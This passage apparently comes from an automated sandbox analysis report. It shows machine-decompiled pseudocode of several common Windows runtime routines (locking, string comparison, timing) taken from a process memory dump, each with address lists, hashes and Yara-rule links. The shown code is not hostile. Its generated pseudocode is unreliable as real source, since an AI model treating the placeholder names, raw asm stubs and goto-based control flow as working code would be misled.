								_t13 = _t104 + 0xc; // 0x2e82bb5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E036FF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E036DEEF0(0x37b79a0);
									__eflags =  *0x37b8210 - _t104; // 0x2e82ba8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x37b8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E03744888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E036DEB70(_t95, 0x37b79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E037095D0();
											L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E037095D0();
											L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E036DEB70(_t93, 0x37b79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E037095D0();
										L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E037095D0();
										L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E036FF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                      0x036c52a5
                                      0x036c52ad
                                      0x036c52b0
                                      0x036c52b3
                                      0x036c52b7
                                      0x036c52ba
                                      0x036c52bf
                                      0x036c52c4
                                      0x036c52cc
                                      0x00000000
                                      0x00000000
                                      0x036c52ce
                                      0x036c52d9
                                      0x036c52dd
                                      0x036c52e7
                                      0x036c52f7
                                      0x036c52f9
                                      0x036c52fd
                                      0x03720dcf
                                      0x03720dd5
                                      0x03720dd6
                                      0x03720dd7
                                      0x03720dd8
                                      0x03720dd9
                                      0x03720dde
                                      0x03720ddf
                                      0x03720de0
                                      0x03720de1
                                      0x03720de2
                                      0x03720de5
                                      0x03720dea
                                      0x03720dec
                                      0x03720f60
                                      0x03720f64
                                      0x03720f70
                                      0x03720f76
                                      0x03720f79
                                      0x03720f79
                                      0x00000000
                                      0x03720f64
                                      0x03720df2
                                      0x03720df7
                                      0x03720e04
                                      0x03720e0d
                                      0x03720e0d
                                      0x03720e10
                                      0x03720e1a
                                      0x03720e1c
                                      0x03720e4c
                                      0x03720e52
                                      0x03720e61
                                      0x03720e67
                                      0x03720e6b
                                      0x03720e70
                                      0x03720e76
                                      0x03720ed7
                                      0x03720edc
                                      0x03720ee0
                                      0x03720ee6
                                      0x03720eea
                                      0x03720eed
                                      0x03720ef0
                                      0x03720ef3
                                      0x03720ef6
                                      0x03720ef9
                                      0x03720efe
                                      0x03720f01
                                      0x03720f01
                                      0x03720f0b
                                      0x03720f12
                                      0x03720f16
                                      0x03720f18
                                      0x03720f1b
                                      0x03720f2c
                                      0x03720f31
                                      0x03720f31
                                      0x03720f35
                                      0x03720f39
                                      0x03720f3a
                                      0x03720f3c
                                      0x03720f3f
                                      0x03720f50
                                      0x03720f55
                                      0x03720f55
                                      0x03720f59
                                      0x036c52eb
                                      0x036c52f1
                                      0x036c52f1
                                      0x03720e7d
                                      0x03720e84
                                      0x03720e88
                                      0x03720e8a
                                      0x03720e8d
                                      0x03720e9e
                                      0x03720ea3
                                      0x03720ea3
                                      0x03720ea7
                                      0x03720eaf
                                      0x03720eb3
                                      0x03720eb9
                                      0x03720eb9
                                      0x03720ebc
                                      0x03720ecd
                                      0x03720ecd
                                      0x00000000
                                      0x03720eb3
                                      0x03720e21
                                      0x03720e2b
                                      0x03720e2f
                                      0x03720e30
                                      0x03720e3a
                                      0x03720e3f
                                      0x03720e41
                                      0x00000000
                                      0x00000000
                                      0x03720e47
                                      0x00000000
                                      0x03720e47
                                      0x03720df9
                                      0x03720dfe
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x03720dfe
                                      0x036c5303
                                      0x036c5307
                                      0x00000000
                                      0x036c5309
                                      0x00000000
                                      0x036c5309
                                      0x036c5307
                                      0x036c52e9
                                      0x036c52e9
                                      0x00000000
                                      0x036c52e9
                                      0x036c530e
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b7497fa115672d9293ebc3bfbd238998a8bedb4e94e1990bb73bdc570398db8c
                                      • Instruction ID: 4950779627b4aa0058eeb0758c9728bca316582129bd3a6ae37320e50dd3a457
                                      • Opcode Fuzzy Hash: b7497fa115672d9293ebc3bfbd238998a8bedb4e94e1990bb73bdc570398db8c
                                      • Instruction Fuzzy Hash: 5D51DB74106781AFD720EF64C945B27BBE8FF80710F18091EE5968B691E774F844C7A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F2AE4, Relevance: .2, Instructions: 159COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036F2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x37b8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x37b8208; // 0x37b8207
				_t8 = _t57 + 0x37b8208; // 0x37b8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x37b8450; // 0x2e8173a
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x37b821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x37b6d5c; // 0x7f6b0654
							_t72 =  *0x37b6d5c; // 0x7f6b0654
							_t75 =  *0x37b6d5c; // 0x7f6b0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x37b6d5c; // 0x7f6b0654
							_t84 =  *0x37b6d5c; // 0x7f6b0654
							_t87 =  *0x37b6d5c; // 0x7f6b0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0370F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                      0x036f2ae4
                                      0x036f2aec
                                      0x036f2aef
                                      0x036f2af4
                                      0x036f2af7
                                      0x036f2afd
                                      0x036f2b92
                                      0x036f2b92
                                      0x036f2b97
                                      0x036f2b9c
                                      0x036f2b9c
                                      0x036f2b03
                                      0x036f2b06
                                      0x036f2b09
                                      0x036f2b09
                                      0x036f2b0f
                                      0x036f2b15
                                      0x036f2b15
                                      0x036f2b1b
                                      0x036f2b1e
                                      0x036f2b21
                                      0x036f2b26
                                      0x036f2b29
                                      0x036f2b81
                                      0x036f2b84
                                      0x036f2c0e
                                      0x036f2c15
                                      0x036f2c24
                                      0x036f2c24
                                      0x036f2b8a
                                      0x036f2b8a
                                      0x036f2b8a
                                      0x036f2b8a
                                      0x036f2b90
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036f2b4a
                                      0x036f2b4a
                                      0x036f2b4d
                                      0x036f2b53
                                      0x00000000
                                      0x00000000
                                      0x036f2b55
                                      0x036f2b58
                                      0x036f2bb7
                                      0x03735d1b
                                      0x03735d37
                                      0x03735d47
                                      0x03735d53
                                      0x036f2bbd
                                      0x036f2bbd
                                      0x036f2bbd
                                      0x036f2bb7
                                      0x036f2b5d
                                      0x036f2c2f
                                      0x03735d5b
                                      0x03735d77
                                      0x03735d87
                                      0x03735d93
                                      0x036f2c35
                                      0x036f2c35
                                      0x036f2c35
                                      0x036f2c2f
                                      0x036f2b65
                                      0x036f2b9f
                                      0x036f2ba2
                                      0x036f2b67
                                      0x036f2b67
                                      0x036f2b69
                                      0x036f2b6b
                                      0x036f2b6e
                                      0x036f2bc9
                                      0x036f2bcc
                                      0x036f2bcf
                                      0x036f2bd4
                                      0x036f2bd6
                                      0x036f2bd6
                                      0x036f2bdb
                                      0x036f2c02
                                      0x036f2c05
                                      0x036f2c07
                                      0x00000000
                                      0x036f2c07
                                      0x036f2be0
                                      0x036f2c00
                                      0x036f2c3f
                                      0x036f2c3f
                                      0x00000000
                                      0x036f2c00
                                      0x036f2be5
                                      0x036f2be7
                                      0x036f2bec
                                      0x036f2bf4
                                      0x036f2bf6
                                      0x00000000
                                      0x036f2bf6
                                      0x036f2b70
                                      0x036f2b76
                                      0x036f2b2b
                                      0x036f2b2b
                                      0x036f2b2d
                                      0x036f2b2f
                                      0x036f2b32
                                      0x036f2b35
                                      0x036f2b3a
                                      0x00000000
                                      0x036f2b40
                                      0x036f2b43
                                      0x036f2b45
                                      0x036f2b47
                                      0x036f2b4a
                                      0x036f2b4d
                                      0x036f2b53
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036f2b53
                                      0x036f2b78
                                      0x036f2b78
                                      0x036f2b7b
                                      0x036f2b7e
                                      0x00000000
                                      0x036f2b7e
                                      0x036f2b76
                                      0x036f2ba5
                                      0x036f2ba5
                                      0x036f2ba8
                                      0x036f2bad
                                      0x00000000
                                      0x00000000
                                      0x036f2baf
                                      0x036f2baf
                                      0x036f2bc2
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c0b6098d8a63f759d53246b8299cf7de0e028556d454e963705ba48dbf1a9f68
                                      • Instruction ID: d530e1683968dd0e4d4a2913cda065bb599b4ba628889a99524e4d3aa96578de
                                      • Opcode Fuzzy Hash: c0b6098d8a63f759d53246b8299cf7de0e028556d454e963705ba48dbf1a9f68
                                      • Instruction Fuzzy Hash: A451E17AE00115CFCB18DF1CC8A09BEB7B5FB88704715895AED46AB358E734AA51CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036EDBE9, Relevance: .1, Instructions: 149COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E036EDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E036CCC50(E036C4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E036E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E03798ED6(_t102, _t98);
						}
						_t76 = _v44;
						E036E2280(_t58, _v44);
						E036EDD82(_v44, _t102, _t98);
						E036EB944(_t102, _v5);
						return E036DFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x37b8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x37b862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x37b8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x37b862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x378fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                      0x036edbe9
                                      0x036edbf2
                                      0x036edbf7
                                      0x036edbf9
                                      0x036edbfc
                                      0x036edc00
                                      0x036edc03
                                      0x036edc14
                                      0x036edd54
                                      0x036edd54
                                      0x036edd54
                                      0x036edc18
                                      0x036edc1d
                                      0x036edc1d
                                      0x036edc32
                                      0x036edc3b
                                      0x036edc3e
                                      0x036edc46
                                      0x036edd5b
                                      0x036edd62
                                      0x036edd64
                                      0x036edd67
                                      0x036edd69
                                      0x036edd6b
                                      0x036edd6e
                                      0x036edd70
                                      0x036edd73
                                      0x036edd73
                                      0x00000000
                                      0x036edc4c
                                      0x036edc4e
                                      0x03733ae3
                                      0x03733ae8
                                      0x03733aea
                                      0x036edce7
                                      0x036edce9
                                      0x036edcec
                                      0x036edcee
                                      0x036edcf0
                                      0x036edcf3
                                      0x036edcf5
                                      0x03733af2
                                      0x03733af5
                                      0x03733af5
                                      0x036edd06
                                      0x036edd08
                                      0x036edd0b
                                      0x036edd12
                                      0x03733b08
                                      0x036edd18
                                      0x036edd18
                                      0x036edd18
                                      0x036edd20
                                      0x036edd23
                                      0x03733b16
                                      0x03733b16
                                      0x036edd29
                                      0x036edd2d
                                      0x036edd36
                                      0x036edd40
                                      0x036edd51
                                      0x036edd51
                                      0x036edc54
                                      0x036edc59
                                      0x036edc59
                                      0x036edc5e
                                      0x036edc5e
                                      0x036edc63
                                      0x036edc66
                                      0x036edc6b
                                      0x036edc78
                                      0x036edc7b
                                      0x036edc81
                                      0x036edc81
                                      0x036edc83
                                      0x036edc89
                                      0x00000000
                                      0x00000000
                                      0x036edd7b
                                      0x036edd7b
                                      0x036edc8f
                                      0x036edc8f
                                      0x036edc92
                                      0x036edc99
                                      0x036edc9f
                                      0x036edca5
                                      0x036edcaa
                                      0x036edcaa
                                      0x036edcb3
                                      0x036edcb8
                                      0x036edcbb
                                      0x036edcc1
                                      0x036edccf
                                      0x036edcd2
                                      0x036edcd5
                                      0x036edcd7
                                      0x036edcda
                                      0x036edcdc
                                      0x036edcdc
                                      0x036edce2
                                      0x036edce4
                                      0x00000000
                                      0x036edce4

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7a57e0247cba58fe32286549596833efd4d91fe15e94644a7b0b728c60522be6
                                      • Instruction ID: df06041e6a054274f7e594221b9738c0ab3e22a1c0b9060ed5156be78071eaef
                                      • Opcode Fuzzy Hash: 7a57e0247cba58fe32286549596833efd4d91fe15e94644a7b0b728c60522be6
                                      • Instruction Fuzzy Hash: DE510075A02215DFCB14CFA8C490BAEFBF9FF49350F24819AD555AB340EB30A948CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036DEF40, Relevance: .1, Instructions: 147COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E036DEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E036C9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E036C2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                      0x036def4b
                                      0x036def4d
                                      0x036def57
                                      0x036df0bd
                                      0x036df0c2
                                      0x036df0d2
                                      0x036df0d2
                                      0x036df0c2
                                      0x036def5d
                                      0x036def5f
                                      0x036def67
                                      0x036def6a
                                      0x036def6d
                                      0x036def74
                                      0x036def7f
                                      0x036def82
                                      0x036def82
                                      0x036def86
                                      0x036def88
                                      0x036def8c
                                      0x036def8f
                                      0x036def8f
                                      0x036def8f
                                      0x00000000
                                      0x036def91
                                      0x036def93
                                      0x036defc4
                                      0x036defc4
                                      0x036defc4
                                      0x036defca
                                      0x036defd0
                                      0x036df0a6
                                      0x00000000
                                      0x00000000
                                      0x036df0af
                                      0x0372bb06
                                      0x0372bb0a
                                      0x036df0b5
                                      0x036df0b5
                                      0x036df0b5
                                      0x036df0b5
                                      0x00000000
                                      0x036defd6
                                      0x036defd9
                                      0x036df0de
                                      0x036df0e2
                                      0x036defdf
                                      0x036defdf
                                      0x036defdf
                                      0x036defe5
                                      0x0372bafc
                                      0x0372bafc
                                      0x036defe5
                                      0x036defeb
                                      0x036defed
                                      0x036df00f
                                      0x036df011
                                      0x036df01a
                                      0x036df01d
                                      0x036df021
                                      0x036df028
                                      0x036df029
                                      0x036df029
                                      0x036df02c
                                      0x00000000
                                      0x036df02c
                                      0x036deff3
                                      0x036deff9
                                      0x036df0ea
                                      0x036df0ed
                                      0x036df0ef
                                      0x00000000
                                      0x036df0ef
                                      0x036df003
                                      0x0372bb12
                                      0x036df045
                                      0x036df049
                                      0x036df051
                                      0x036df09e
                                      0x036df0a0
                                      0x036df0a0
                                      0x036df09e
                                      0x036df053
                                      0x036df064
                                      0x036df064
                                      0x036df06b
                                      0x0372bb1a
                                      0x0372bb1a
                                      0x036df071
                                      0x036df071
                                      0x036df07d
                                      0x036df082
                                      0x036df08f
                                      0x036df08f
                                      0x036df009
                                      0x036df00d
                                      0x00000000
                                      0x036df00d
                                      0x036defd0
                                      0x036def97
                                      0x036defa5
                                      0x036defaa
                                      0x00000000
                                      0x036defac
                                      0x036defac
                                      0x036defac
                                      0x00000000
                                      0x036defb2
                                      0x036df036
                                      0x036df03a
                                      0x036df040
                                      0x036df090
                                      0x00000000
                                      0x036df092
                                      0x036df042
                                      0x00000000
                                      0x036df042
                                      0x036defb7
                                      0x036defb9
                                      0x036defbc
                                      0x036defb0
                                      0x036defb0
                                      0x00000000
                                      0x036defbe
                                      0x036defbe
                                      0x036defc1
                                      0x00000000
                                      0x036defc1
                                      0x036defbc
                                      0x036defaa
                                      0x036def91

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
